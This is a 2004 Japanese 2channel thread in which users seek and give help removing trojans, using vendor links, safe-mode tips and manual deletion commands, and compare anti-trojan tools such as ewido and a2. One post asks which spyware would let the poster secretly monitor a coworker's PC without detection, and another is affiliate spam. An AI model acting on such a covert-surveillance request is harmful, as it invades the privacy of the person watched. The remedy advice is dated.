267 ：名無しさん＠お腹いっぱい。 ：04/08/28 17:01: >>266
ベタベタ貼り付けるな！
268 ：名無しさん＠お腹いっぱい。 ：04/08/28 17:57: downloader.trojanというウイルスがＰＣ内に
いるのですが、除去できません。
どうしたらいいでしょうか。
269 ：名無しさん＠お腹いっぱい。 ：04/08/28 18:01: >>268
http://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/jp_docid/20030926221125958
ねぇ、なんでそのウィルスを検出したソフトのスレッドで聞かないの？
270 ：名無しさん＠お腹いっぱい。 ：04/08/28 18:04: >>268
http://www.symantec.com/region/jp/sarcj/data/d/downloader.trojan.html#removalinstructions
271 ：いなむらきよし ：04/08/29 07:48: 奇形の木馬(^_^)
272 ：名無しさん＠お腹いっぱい。 ：04/08/31 11:48: 誰かバカフィーがスルーするトロイ知らない？
273 ：名無しさん＠お腹いっぱい。 ：04/08/31 12:47: >>272
バカは氏ね。
274 ：名無しさん＠お腹いっぱい。 ：04/09/01 10:32: スタートアップフォルダを監視できるソフト知りませんか？
RegporotとTeatimerは見ていないようだし、SSMはちょっと大げさだし。
軽いやつあったら教えて下さい。
275 ：名無しさん＠お腹いっぱい。 ：04/09/01 23:41: >>274
http://www.mlin.net/StartupCPL.shtml
276 ：275 ：04/09/01 23:43: スマン、監視とはちょっと違うかもしれないわ。
277 ：274 ：04/09/03 14:24: >>276
ありがとう！紹介してくれたものの下にあった
StartupMonitorを試したらフォルダも監視してくれました。
http://www.mlin.net/StartupMonitor.shtml

Regprotと同じぐらい軽いです。どのエントリを見ているか
まだ不明ですが、TeaTimerの替わりに使ってみます。感謝！
278 ：274 ：04/09/03 14:51: 最初ちょっと迷ったので使う人に説明しておきますね。
これ、msiインストーラ使ってるんですがインストール
したあとにできるスタートメニューにあるショートカットは
なぜかStartupMonitorを終了させるリンクです。
実行ファイルは C:\WINDOWSにあるStartupMonitor.exeです(XPのばあい)。

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に登録されてWindows起動時に常駐します。ダウンロードページに
説明がありますが、アンインストールはプログラムの追加と削除からできるようです。
279 ：名無しさん＠お腹いっぱい。 ：04/09/05 11:26: a2スレで出てたけどVer2.0くるみたい
280 ：名無しさん＠お腹いっぱい。 ：04/09/05 18:42: ノートン使ってるがトロイの木馬、韓国からのがずば抜けて多い。
ったく迷惑な…。
281 ：名無しさん＠お腹いっぱい。 ：04/09/05 18:49: 韓国からメールがくるのか？
ワームじゃなくて？
282 ：名無しさん＠お腹いっぱい。 ：04/09/08 02:03: ウイルス踏んだのでリカバリし直したんですが、
どうもたまに挙動がおかしいかんじ・・・疑心暗鬼？

ウイルスソフトじゃ駄目ってのなら、具体的にどうすればスッキリした気分になれるでしょうか？
283 ：名無しさん＠お腹いっぱい。 ：04/09/08 07:19: ウィルスソフトはウィルス本体だろ
ダメに決まってるやん w
284 ：名無しさん＠お腹いっぱい。 ：04/09/08 19:32: >>283は天才児
285 ：名無しさん＠お腹いっぱい。 ：04/09/08 21:44: >>282
OS再インストール。

でもインストール中にウィルスにやられたりして。
286 ：名無しさん＠お腹いっぱい。 ：04/09/12 15:57:37: C:\Program Files\gikoNavi\Log\2ch\exam\1079958163.dat
がオンラインスキャンで出てきました　orz

手動で削除するにはどうすれば良いですか？
ちなみにこのトロイはパスワードを送信するらしい　もうだめぽ　orz
287 ：名無しさん＠お腹いっぱい。 ：04/09/12 16:06:20: >>285
インストール中にはやられない
やられるのはネットに繋いでから
288 ：名無しさん＠お腹いっぱい。 ：04/09/12 18:30:59: ローカルとかLAN内とか
289 ：名無しさん＠お腹いっぱい。 ：04/09/13 20:14:50: >>286
誤検出の可能性は？
OpenJaneのログにノートンが過剰反応する話は結構有名だけど、それと同じだったりして
290 ：名無しさん＠お腹いっぱい。 ：04/09/14 03:29:11: マルチしてすみません。トロイのスレこっちだったので書き直します

ウィルスバスターのオンラインチェックで
Ｃ￥ＷＩＮＮＴ\downroadedPROGRAMFILES￥ｔｌ７０００.DLLというファイルに
「TROJ_SOBIT.A」と言うトロイが感染していると出てきました、

しかし検索をかけても該当のファイルが出てきません
再度ウィルスチェックをかけると、ファイルはまだあることになっているのですが
どうしてでかわかる人いますか？

レジストリのいらない情報は下記により削除しています。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_SOBIT.A
291 ：名無しさん＠お腹いっぱい。 ：04/09/14 04:07:22: >>290
セーフモードでやってみてごらん
292 ：名無しさん＠お腹いっぱい。 ：04/09/14 08:08:01: >>290
検索にはオプション設定があるし、エクスプローラーにもフォルダオプションがある
あんたの設定がまずいから表示されない
293 ：名無しさん＠お腹いっぱい。 ：04/09/14 09:54:02: 今、セキュリティが！と反応してたので押してみたらトロイの木馬だった
アメリカからやられてた　これまでも中国、韓国、フランスと来ている
294 ：名無しさん＠お腹いっぱい。 ：04/09/14 12:53:20: >>293
嫌だったら、ファイアーウォールくらい入れろよ
295 ：ぼるじょあ ◆yBEncckFOU ：04/09/14 13:00:19: >>290
ActiveXコントロールの"中"に該当ファイルがあると思うよ

"Downloaded Program Files"フォルダを開いて、核ファイルの
プロパティ→依存関係をチェックする

該当ファイルが含まれているファイルを削除する
296 ：名無しさん＠お腹いっぱい。 ：04/09/14 13:13:11: >>290
わりぃ　わりぃ
C:\WINDOWS\Downloaded Program Files
この中かよ
エクスプローラーでは全部見えないから
コマンドプロンプトで
cd C:\WINDOWS\Downloaded Program Files
dir　これでフォルダの中が表示される
del 問題のファイルをフルパスで入力 /f
297 ：名無しさん＠お腹いっぱい。 ：04/09/14 13:21:24: スペースが途中に含まれているから
cd "C:\WINDOWS\Downloaded Program Files"
dir　これでフォルダの中が表示される
del 問題のファイルを拡張子まで入力 /f
298 ：290 ：04/09/14 18:29:26: ありがとう
プロパティで会社名が不明とか怪しいファイルをまとめて削除したら
消えました。
エクスプローラーでは見えないのですね
299 ：ぼるじょあ ◆yBEncckFOU ：04/09/14 19:09:57: >>290
すでに解決ずみのようだけど、烏賊蛇足

ウィルスバスターオンラインスキャンで感染ファイル
が見つかった場合、パスが途切れて見えないことがある

上のつまみ(項目の境目)を右にスライドさせると
横スクロールバーが現れて、フルパスを確認できる

そうするとどのファイルが感染しているかがわかるので
対処が容易になる
(今回のケースでいうと感染ファイルはActiveXの実体)

またUSサイトのオンラインスキャンのほうが自動駆除
オプションが使えるので、対処が楽になるケースもあるので
おすすめ
ttp://housecall.trendmicro.com/
300 ：名無しさん＠お腹いっぱい。 ：04/09/15 14:29:53: トロイに感染したファイルが３つあって場所は
C:WINDOWS\SYSTEM\winnet.dll
C:WINDOWS\SYSTEM\run_dos.dll
C:WINDOWS\SYSTEM\rnr.dll

なのですが全て手動で削除してもかまわないものですか？
一応質問します。お願いします。
301 ：名無しさん＠お腹いっぱい。 ：04/09/15 14:51:18: 　何も知らないんですね
302 ：286 ：04/09/15 15:03:30: >>289
亀レスですが・・・みたいですね
他のソフト（a2/ewide）で確認しても出てこないし
一応心配なのでログは消しましたが、ありがとうございました
303 ：名無しさん＠お腹いっぱい。 ：04/09/16 13:41:17: 緊急age

おまいら
http://pc5.2ch.net/test/read.cgi/sec/1060956936/の638を読んでください

ewidoもGDI＋のバグの可能性ある
304 ：名無しさん＠お腹いっぱい。 ：04/09/16 18:01:09: SP2にすりゃいいんだろ
305 ：名無しさん＠お腹いっぱい。 ：04/09/16 20:12:21: >304
SP2のセキュリティーホールだべ
306 ：名無しさん＠お腹いっぱい。 ：04/09/17 16:09:38: >>303
なんでewidoに入ってるのか、解説ｷﾎﾞﾝ。
307 ：名無しさん＠お腹いっぱい。 ：04/09/18 11:52:56: >>306
ewidoが自分自身の描画用に使ってるんだろ。
308 ：名無しさん＠お腹いっぱい。 ：04/09/23 07:33:12: 保守
309 ：名無しさん＠お腹いっぱい。 ：04/09/23 22:30:10: ewidoすげえ、まだノートンも正式対応してない苺キンタマに早くも対応済
310 ：名無しさん＠お腹いっぱい。 ：04/09/24 00:05:00: たまーに少しうｐしてるところもかわいい(;´Д｀)
311 ：名無しさん＠お腹いっぱい。 ：04/09/24 15:12:07: 会社の同僚の女の子のPCをｺｿｰﾘ覗きたいんですけど、
どんなスパイウェアがいいでつかね？

VNCはタスクトレイに表示が出ちゃうから
すぐﾊﾞﾚちゃうし・・・
312 ：名無しさん＠お腹いっぱい。 ：04/09/24 15:25:05: ａ2うｐまだ？
313 ：名無しさん＠お腹いっぱい。 ：04/09/24 21:57:31: ａ2検出力低いみたいだねぇ
漏れ入れてるからがんがってほしい
314 ：　：04/09/26 06:47:40: ※PCウイルスが深刻化しています！！
↓
http://headlines.yahoo.co.jp/hl?a=20040925-00000013-zdn_ep-sci
今すぐノートンウイルスソフトを購入されることを強くおすすめします！！
Norton Internet Security 2004 Professionl
http://pt.afl.rakuten.co.jp/c/0049f2c6.43316645/?url=http%3a%2f%2fwww.rakuten.co.jp%2fjib%2f810923%2f810924%2f825843%2f%23641840
シマンテック　ウイルス対策ソフト　インターネットセキュリティ2004　Norton InternetSecurity
http://pt.afl.rakuten.co.jp/c/0047d0ca.5ad9afa3/?url=http%3a%2f%2fwww.rakuten.co.jp%2fjba%2f473599%2f475511%2f475523%2f%23523551
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
デスクトップ画像をあぷろだにUpするトロイの木馬が出現
シマンテックは9月24日、P2Pソフト「Winny」を介して広まっているトロイの木馬
「Trojan.Upchan」に対する警告を発した（25日11時30分追記、一部改変：
シマンテックの情報では「Winny経由」となっていたが、実際にはWinnyとは関係なく、
本体は名前を変えながら複数のアップローダから配布されている模様だ。このファイルを実行してしまうと
PCに本体がコピーされ、デスクトップのスクリーンショットが8分おきに、一種の画像掲示板である
アップローダに公開されてしまう。
つまり、もしそのタイミングでメーラーを開いていれば自分のメールアドレスやメールの内容が、
Webブラウザを起動していれば閲覧しているWebページが、インスタントメッセンジャーを利用していれば
会話の内容が記録され、アップロードされてしまうことになる。既9月24日23時の時点では、このトロイの木馬に対応した定義ファイルを提供しているのはシマンテックのみの模様だ。同社製品を
利用している場合は早期のアップデートが望ましい。また、それ以外の製品を利用している場合は、リスクが伴うが
トロイの木馬本体（shellsystem.exe）の削除およびレジストリの削除によって復旧させることになる。
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
315 ：名無しさん＠お腹いっぱい。 ：04/09/26 08:47:33: >>314
これって「卓上」って書いた奴のこと？
316 ：名無しさん＠お腹いっぱい。 ：04/09/26 12:34:08: 常駐していたMcAfeeVirusScanで「Exploit-URLSpoof.gen」というトロイを検出しました。
場所はC:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5でした。
駆除ができなかったのでファイルごと削除したのですが、対応はこれだけで十分なのでしょうか？
ご意見よろしくお願いいたします。
317 ：名無しさん＠お腹いっぱい。 ：04/09/26 13:20:33: >>316
たぶん、ホームページを見て感染する種類のトロイだと思うよ
不安ならここのスレのものを入れてみるなり、SpybotやAd-awareなり
入れてみるなりしてみればいいと思うよ
318 ：316 ：04/09/26 17:14:31: >>317

ご意見ありがとうございました。
McAfeeVirusScan、a2、Spybotでスキャンしたところ、特に検出されませんでした。
とりあえず一安心といったところです。

ところで「常駐」ということは感染したら即時に検出、に近いイメージが自分にはあります。
そこで「Exploit-URLSpoof.gen」が検出されたタイミングが非常に気になってます。
タブブラウザソフトについてた検索バーのグーグルであるキーワードを検索しようとしました。
その検索結果が表示された瞬間にMcAfeeVirusScanが「Exploit-URLSpoof.gen」を検出したんです。
念のため1回目の削除後にもう1回同じキーワードで検索したらまた反応しました。
その時は削除後のMcAfeeVirusScanでもう1つ「Exploit-URLSpoof.gen」を検出しました。
これってその検索結果表示のページに仕組まれてる可能性があるってことになるんでしょうか？
319 ：あぼーん ：あぼーん: あぼーん
320 ：名無しさん＠お腹いっぱい。 ：04/09/26 18:59:18: ↑(ﾉ∀｀*)ﾌﾟﾌﾟﾌﾟ
321 ：みー：04/09/26 21:11:22: 画像見ようとしてクリックしたらトロイの木馬が検出されましたとか表示されました！
あわてて電源きって再起動してインターネットしようとしたら、
最初のページが外国語のサイトになってしまいました。
本当わけわからなくて困ってます。
どうしたらいいでしょうか？
322 ：名無しさん＠お腹いっぱい。 ：04/09/26 21:19:31: >>321
"スパイウェア"で検索してわからなければパソコン修理に出せ。
323 ：名無しさん＠お腹いっぱい。 ：04/09/26 21:19:42: >>321
エロサイト見たら…助けて下さい！Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/
ここのテンプレを、順番に全てやってみろ
324 ：みー：04/09/26 21:49:59: ありがとうございます。
試してみますが、私まだ高校生でコンピュータの知識があまりないんです。
だからもう少し詳しく教えてもらえませんか？
今からできる限りの事を試してみます。
325 ：名無しさん＠お腹いっぱい。 ：04/09/26 21:51:40: >>324
だから、そっちのスレにあるテンプレを全部試してみろって言ってるんだよ。
詳しく教えろだなんだって、お前まだ読んでもいないだろうが。
知識のあるなしと、テンプレ読む読まないは別だっての。勘違いするな。
326 ：名無しさん＠お腹いっぱい。 ：04/09/26 21:56:25: >>324
苺キンタマって知ってるか？おまいのような初心者が必ずやられる
恐ろしいウィルスだぞ。知識がないならパソコンの電源切れ。それだけで済む。
327 ：みー：04/09/26 22:07:47: すみませんでした。
再起動したらデスクトップに女の人のリンク画像みたいなものがでてきていました。。
今ウイルスのスキャン？みたいなものをしています。
328 ：名無しさん＠お腹いっぱい。 ：04/09/26 22:16:26: キンタマにやられた。直せねぇ　つд｀)
329 ：名無しさん＠お腹いっぱい。 ：04/09/26 22:26:58: ewidoでスパイウェアひっかかったｗ
初めてでうれしかったよぅ
330 ：みー：04/09/26 22:27:56: スキャンに時間がかかり、途中でキャンセルしました。
テンプレの方で、ウインドウズの「Me」はシステムの復元という方法もあると書いてあったので、
それを実行しました。
自動的に再起動して、デスクトップは普通に戻り、
インターネットの最初のページも普通に戻りました。
さっきは初めてのウイルスにびっくりしてしまい自己中な事書いてしまって本当すみません。
他のスレ紹介してくれた方もありがとうございました。
今後は気をつけます。
まだ直ってなかったらもう一度きます。
331 ：名無しさん＠お腹いっぱい。 ：04/09/26 22:34:49: >>330
システムの復元やっただけじゃ、ウィルスなりスパイウェアは中に入ったまま
（レジストリだけ元の状態に戻した、ってだけ）
テンプレは面倒くさがらずに全部やれ、質問は向こうのスレでやれ
こっちで聞くのはスレ違い
332 ：名無しさん＠お腹いっぱい。 ：04/09/27 03:14:12: あのーTROJ_PORNDIAL.BPにかかっちゃったみたいなんですが
トレンドマイクロのウィルスデータベースで調べて対処方やってみたんですが
何度もそのファイルを削除してるんですがまたすぐ復活してしまいます。
どうやれば完璧に消し去ることができるんでしょうか？（つд`）
インターネットやってる途中に勝手に国名聞いてくるやつが開いて
困ってます(；・∀・)対処方知ってたら教えてください(´；ω；｀)
333 ：名無しさん＠お腹いっぱい。 ：04/09/27 10:02:59: >>332
おーえすはなに　はてな
334 ：名無しさん＠お腹いっぱい。 ：04/09/27 10:11:39: >>332
ちゃらけた顔文字使って余裕たっぷりだな。
もっとせっぱ詰まってから来てまじめに書けよ。
335 ：名無しさん＠お腹いっぱい。 ：04/09/27 12:03:35: test
336 ：名無しさん＠お腹いっぱい。 ：04/09/27 15:09:19: OSはXPです。
337 ：名無しさん＠お腹いっぱい。 ：04/09/27 15:12:06: >>336
システムの復元を無効にしてる？
あとレジストリの修復は？
338 ：名無しさん＠お腹いっぱい。 ：04/09/27 16:57:48: ttp://www.symantec.com/region/jp/avcenter/venc/data/trojan.chost.html
↑Symantecでは「trojan.chost」と呼ばれているようですが、Trendmicroでの呼び方を教えた下さい。
339 ：名無しさん＠お腹いっぱい。 ：04/09/27 17:14:37: >>338
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_HOSTER.A
別名
340 ：名無しさん＠お腹いっぱい。 ：04/09/27 17:35:06: >>339
サンクスです。早速手動で削除してみます。
341 ：名無しさん＠お腹いっぱい。 ：04/09/27 18:07:56: >>337
システム復元無効にしてますが戻ってきます・・・
レジストリの修復もだめっぽいです。
342 ：名無しさん＠お腹いっぱい。 ：04/09/27 19:24:05: おい、馬鹿ども。
ここは質問スレじゃねぇ。
質問したい馬鹿も回答したい馬鹿も、どっか他所いってしろ。
343 ：名無しさん＠お腹いっぱい。 ：04/09/27 21:30:00: 質問失礼します。
トロイの木馬対策のソフトをＰＣにインストールしたいのですが、
どの「アンチトロイソフト」をインストールすればいいのかが分かりません。
どなたかアドバイス頂けないでしょうか？
よろしくお願いします。
344 ：名無しさん＠お腹いっぱい。 ：04/09/27 21:36:45: >>343
お断りします。
345 ：名無しさん＠お腹いっぱい。 ：04/09/27 21:42:51: >>343
今のところ、対策としてはこれが無料で最強（無料）
■トロイ検出・駆除　ewido-Free
ttp://www.ewido.net/en/?section=download
346 ：名無しさん＠お腹いっぱい。 ：04/09/27 22:09:24: >>345
これ今日入れたんだけど常駐するの？
アイコンがタスクバーにあるんだけど…
これって常駐してるって事じゃないの？
フリーは常駐しないんだよね
なんかよく分からない(´･ω･`)
347 ：名無しさん＠お腹いっぱい。 ：04/09/27 22:14:23: とりあぜずスレ全部読め
300くらいなら数分
わかんないところあったら教える
348 ：名無しさん＠お腹いっぱい。 ：04/09/27 22:29:54: 数分～300秒
1秒/スレ
349 ：345 ：04/09/27 23:05:17: >>347
二週間したら常駐しなくなるんだ
苺キンタマ対応って聞いたから入れてスキャンしたら
違うトロイが見つかった(´･ω･`)ﾊｩ…
350 ：名無しさん＠お腹いっぱい。 ：04/09/27 23:06:33: 間違えた346です
351 ：名無しさん＠お腹いっぱい。 ：04/09/27 23:14:00: できればa2+ewidoが(・∀・)ｲｲ!!
352 ：かわうそ ：04/09/28 08:06:41: ここで丁寧に教えても道であったら笑うんだろう?
353 ：名無しさん＠お腹いっぱい。 ：04/09/28 19:56:46: ＰＦＷでＩＥをブロックにしてもトロイは防げないの？
354 ：名無しさん＠お腹いっぱい。 ：04/09/28 23:40:53: 感染してればね
355 ：名無しさん＠お腹いっぱい。 ：04/09/29 00:30:59: >>353
ログを見ていれば気がつくだろ
356 ：名無しさん＠お腹いっぱい。 ：04/09/29 00:35:08: そんなに頻繁に見たりしない
357 ：名無しさん＠お腹いっぱい。 ：04/09/29 01:49:02: ewidoのスキャンって、トロイ見付ける度に止まってる?
クッキーごとに確認求められて、めんどい
358 ：名無しさん＠お腹いっぱい。 ：04/09/29 03:04:26: お前が馬鹿だからだろ。
359 ：名無しさん＠お腹いっぱい。 ：04/09/29 05:40:31: 馬鹿って言う奴が馬鹿
360 ：名無しさん＠お腹いっぱい。 ：04/09/29 08:42:46: 馬鹿って言う奴が馬鹿って言う奴が馬鹿
361 ：名無しさん＠お腹いっぱい。 ：04/09/29 10:37:41: 急にフォレストガンプが見たくなった
362 ：名無しさん＠お腹いっぱい。 ：04/09/29 10:44:30: 1スレ目とエライ違いだな。なんなんだこいつらは。
363 ：名無しさん＠お腹いっぱい。 ：04/09/29 11:26:57: >>362
苺ｷﾝﾀﾏで、Ewidoが注目されたから厨房が流れて来てるんだろうよ
364 ：名無しさん＠お腹いっぱい。 ：04/09/29 12:20:14: 馬鹿って言う奴が馬鹿って言う奴が馬鹿って言う奴が馬鹿
365 ：名無しさん＠お腹いっぱい。 ：04/09/29 21:10:05: (・∀・)ノﾁｭｰﾎﾞｰｶｴﾚ
366 ：名無しさん＠お腹いっぱい。 ：04/09/29 22:43:20: ewido入れてみました。
常駐していません。

アンチトロイソフトが常駐していると、常駐時にはどのような作動が行われているのでしょうか？
あと、ewidoと併用した方がよいアンチトロイソフトがありましたら教えてください。
367 ：名無しさん＠お腹いっぱい。 ：04/09/29 22:51:27: >>366
a2
368 ：名無しさん＠お腹いっぱい。 ：04/09/29 23:18:47: ewido金出せば常駐するYo
369 ：名無しさん＠お腹いっぱい。 ：04/09/30 00:14:30: 14日間は常駐するだろ。インストール時にチェックはずしたか？
Additionalのinstall guardで常駐するんじゃね？
370 ：名無しさん＠お腹いっぱい。 ：04/09/30 13:41:42: ewido入れて2日
相当重いのでタスク調べたらcpuが100になってました
消したら元に戻りました
371 ：名無しさん＠お腹いっぱい。 ：04/09/30 14:59:01: ａ2うｐだてするとエラーが出る(´･ω･｀)
372 ：名無しさん＠お腹いっぱい。 ：04/09/30 15:50:56: 今のところフリーで常駐してくれるやつはないってことですかね
373 ：名無しさん＠お腹いっぱい。 ：04/09/30 16:31:05: ない
つーかこの会話読んでて分からんの？
374 ：名無しさん＠お腹いっぱい。 ：04/09/30 17:20:53: IMEをタスクバーに入れる設定をしているんだが、ewidoが動くとなぜかIMEが
タスクバーから外れて画面表示されるんだが、同様の現象ありませんか?
XP Pro SP2です。
375 ：名無しさん＠お腹いっぱい。 ：04/09/30 18:17:36: エラーはうｐだての前触れだったかｗ

Downloading Signature database update 09/29/2004 ...
Added detection for Worm.Win32.Bagle.as
376 ：名無しさん＠お腹いっぱい。 ：04/09/30 18:19:44: >>374
同じく。トロイの検知機構が、隠す仕組を奪うんだろうね。
377 ：374 ：04/09/30 20:19:24: >>376
にゃるほど。ｻﾝｸｽｺ。
378 ：名無しさん＠お腹いっぱい。 ：04/09/30 22:11:37: なんか15分前位の数分間、ﾉｰﾄﾝｾｷｭで

NetBusトロイの木馬を使ってローカルコンピュータに接続しようとする試みを遮断しました。

と14件ほど、急に検出しまくってた・・・
379 ：名無しさん＠お腹いっぱい。 ：04/09/30 23:37:01: >>378
outpostのログ見ると、
23時から10分程度の間に
ポート1023と5554に10件、通信の要求が来てる。

ポート番号からググって見たら、sasserとかDabber.Bとかのせいらしい。
380 ：名無しさん＠お腹いっぱい。 ：04/10/01 09:55:40: 質問です。
ewidoの終了の仕方が分かりません。プロセス終了させようとしても、アクセス拒否されます。
ZAとかは、右クリックに終了メニューがあるんですが…。

ちなみに、終了方法をぐぐっていたところ、

セキュリティ初心者質問スレッドpart47
http://pc5.2ch.net/test/read.cgi/sec/1095637802/
201 名前：名無しさん＠お腹いっぱい。[] 投稿日：04/09/26 08:15:42
ewidoの終了の仕方がわからないです。どうすればいいですか？

と言うのを発見してこちらに来たんですが、質問もされてないようですし、当然回答もないようです。
381 ：名無しさん＠お腹いっぱい。 ：04/10/01 11:48:09: >>380
Win起動時に常駐されると終了できないみたいなので、
msconfigでスタートアップから外しておいて再起動する。
常駐させていなくても右クリックスキャンはできるみたい。
382 ：名無しさん＠お腹いっぱい。 ：04/10/01 14:06:10: んなｱﾌｫな。
383 ：380 ：04/10/01 15:33:04: >>381
ありがとうございます。
msconfigのスタートアップ見ましたが、ないようでした。再起動すると、現れるのかな。

1度でも実行すると、終了できない感じですね。
なんか、イヤーな動きです。xeroxフォルダかいな。
384 ：名無しさん＠お腹いっぱい。 ：04/10/01 16:17:56: >>383
スタートアップじゃなくてサービスのところだった。
もう一度見てください。
385 ：名無しさん＠お腹いっぱい。 ：04/10/01 16:19:56: >383
サービスに項目あるよ
386 ：名無しさん＠お腹いっぱい。 ：04/10/01 16:49:11: トロイって驚くほどよくできてるだろ。
中にはアンチウイルスソフトやFWを無効化させるものまである。
だから終了できないくらいのほうがいいんじゃないか。
387 ：名無しさん＠お腹いっぱい。 ：04/10/01 16:57:49: サービスで動いているならサービスを停止すればいいだけ
388 ：名無しさん＠お腹いっぱい。 ：04/10/01 17:06:58: ｳpﾀﾞﾃきたね。あの「ポワッ」て音が可愛くて好き。
389 ：380=383 ：04/10/01 17:39:30: >>384 >>385
thx。ありました！
390 ：名無しさん＠お腹いっぱい。 ：04/10/01 23:35:50: ewidoうｐだて先変わった?
213.239.195.138→217.172.187.213
391 ：名無しさん＠お腹いっぱい。 ：04/10/02 01:00:06: >>378-379
今夜もお盛んな模様（´д`；
392 ：名無しさん＠お腹いっぱい。 ：04/10/06 22:26:32: ｷﾞｼｷﾞｼｱﾝｱﾝ
393 ：名無しさん＠お腹いっぱい。 ：04/10/11 05:04:59: マジでどなたか a2 and ewido スレたててくれんかのぉ…
394 ：名無しさん＠お腹いっぱい。 ：04/10/11 05:10:01: EwidoEwidoうるさいあほが増えてこのスレの価値がめっさおちたわぁ～
395 ：名無しさん＠お腹いっぱい。 ：04/10/11 09:38:32: 【フリー版】トロイ対策 a scuared 2【あり】
http://pc5.2ch.net/test/read.cgi/sec/1077204396/l50 は無視ですかそうですか
396 ：名無しさん＠お腹いっぱい。 ：04/10/11 17:01:17: スレに価値もクソもあるかよ(・Ａ・)
397 ：名無しさん＠お腹いっぱい。 ：04/10/12 01:44:23: >>1読めばわかるんだが、本来このスレは
トロイの木馬の現状とそれを取り巻く状況について語るスレ、であって
トロイ対策ソフトを語るスレじゃないんだよな。
危機意識を持つのはいいことなんだが、
ソフトを導入してお終いじゃあ、かえって深い傷を受けることになるよ。
398 ：名無しさん＠お腹いっぱい。 ：04/10/12 02:27:04: キンタマ対応で寄ってきた蛆虫厨房だらけだろ？
こいつらのレベルが低いのは必然なのさ。
399 ：名無しさん＠お腹いっぱい。 ：04/10/12 05:40:42: 　　　　　　　　 ,ｲ　　　　│
　　　　　　　　　 //　　　　 |:!
　　　　　　 //,. -/r‐- ､| !
　　　　　　　 /,/　./　|　　_」ﾄ､
　　　　　　　/.＼`/　　|二...-┘ ヽ
.　　　　　 i　　 ,.>､;／ｰ- ､　　　 l
　　　　　　 ! ∠..＿;'＿＿＿_＼　 |
　　　　　　,!ｲく二>,.、 <二＞｀＼.､ヽ.
　　　　／'´レ--‐'ﾉ. `ｰ---- ､　|＼ヽ、
　　　　＼　 `l　　(!"　　　　 Jfヽ!　 `''-;ゝ
　　　　　 `‐､jヽ　ヾﾆﾆ>　　ﾞｲ" }_,,. ‐''´
　　　　　　 `´＼　ｰ　／ ,ィ_}
.　　　　　　　　 |_ `ー ''´　＿｣'
　　　　　　＿,.|　~||｢　￣　人|､.＿
　　,r=＝;"´　　ヽﾐ|||彡　　／　` ｰ`＝=､-､
.　///,ｲ　＿＿_ ヽ|||_,,. ‐''´＿＿＿　　| | | |ヽ

　　ホワイトベースはコナミの登録商標です
400 ：名無しさん＠お腹いっぱい。 ：04/10/12 06:43:13: 　　　　　　　　　　　　　ぐ''ｰ、　　　　　　　　　　　　　　　　　　　　ぐ'''ｰ､
　　　　　　　　　　　 |　 .〔.. ---､　　　　　　　　　　　　　　　　　　 !　　.| .,,,,
　　　　　　　　 ,,..　-‐'''"゛　　 ._..-‐'"　　　　　　　　　　　　　　　　　　 |　　｀ﾞ´　｀''>
　　　　　　　　　｀"''フ"　_,,.... ￣´ﾞヽ　　　　　　　　　　　　　　　　　　 !　 .|ﾞ^''''"´
　　　　　　　／. ,..‐,ﾞ,,,,,..ヾ　.┴-―ｰ''''''''ｰ､　　　　　　　　　　_、 ._,,,..ゝ　!'ﾆﾆ冖''ｰ､
　　　　　 _,,,.. -┘ _,二-ｰ￢''''''''''''''''''''―-- ....,,,,./ 　　　　　　　　│´ i..　‐''"゛　　│　 .!
　　 .ﾞ'￣ ._,,　‐'"´　_,,　-ｰ'''''二二ﾐﾞ'''‐、　　　　　　　　　　　　 |　 .|.. -‐'''"´ﾞ'ｒ　!　　l
　　　　 ´　　　! ﾞ'"∠.. -、 .ゝ--､ /　　,!　　　　　　　　　　　　　　 l　 ./';;jl　‐''"　　|　　.!
　　　　　　ｌ　ﾞｉ,i;;;;;;′　／ ,i′　/　　　　　　　　　　　　 !　ﾐ　-‐''"゛../ . !　　|
　　　　　　　ｌ　　ｌ_..-′ .!''''''′　/ 　　　　　　　　　　　　　　　!　 .l'''ァ . ／　　.!　　|
　　　　　　　ヽ　,,,_,､　 .i'''''ｰ- ヾ　　　　　　　　　　　　　　　　!　 .!',∠ン -―ｰ″　 !
　　　　　　　　　　 `'',ﾞ,,..ﾉ　 .!''"´｀ﾞ',i　　　　　　　　　　　　 lﾞ‐''′　 .,,　-ｰ''';;;;''''-、 /
　　　　　　　 'ゞ ......〟　,, -‐''"　　　　　　　　　　　　　　　　`--/′　）　　｀''￣ﾞ''ゞ、
　　　　　　　　　　　　...,,,i　 .!------― ,,　　　　　　　　　　 ,／゛ .,／゛　　　　 .'ヽ　　ﾞ'､
　　　　　　 .(''''''''"ﾞﾞ_,,.. -ｰ''''''''''―-　..,,,,_ ｀'､　　　　　　 xﾆ,,.. -'″　　　　　　＼　 |
　　　　　　　ﾞ'ｰ'"゛　　　　　　　　　　 ´　　　　　　　　　　　　　　　　　　　　　　　　｀'゛
401 ：名無しさん＠お腹いっぱい。 ：04/10/13 20:42:41: 苺ｷﾝﾀﾏ
402 ：名無しさん＠お腹いっぱい。 ：04/10/13 23:28:37: ewidoうｐだて
403 ：名無しさん＠お腹いっぱい。 ：04/10/14 06:30:45: >>402
GJ
404 ：名無しさん＠お腹いっぱい ：04/10/14 16:59:42: Swat Itとa2 freeはどちらが評判いいんですか？
スレだとSwat Itは話題になってないようですが。
405 ：名無しさん＠お腹いっぱい。 ：04/10/15 00:31:40: 最近、毎晩TOKAI-NETのIPから攻撃がある
406 ：名無しさん＠お腹いっぱい。 ：04/10/15 18:00:14: ewidoフォルダにある gdiplus.dll って問題ないの？
407 ：名無しさん＠お腹いっぱい。 ：04/10/15 18:03:28: あ　gdiplus.dllとewidoで検索したらJPEG関係ないから大丈夫みたい
408 ：名無しさん＠お腹いっぱい。 ：04/10/15 21:49:10: 誰かマジでewidoのすれ立ててくれ。
409 ：名無しさん＠お腹いっぱい。 ：04/10/16 06:38:32: ewidoを入れてる人、日本語入力中にCTRL + F10などして、
IMEパッドから「手書き」の呼び出しが正常に出来ますか？
410 ：名無しさん＠お腹いっぱい。 ：04/10/16 08:18:53: この方は私たちに理由もなくCtrl+F10を押すことを強要しているのですね
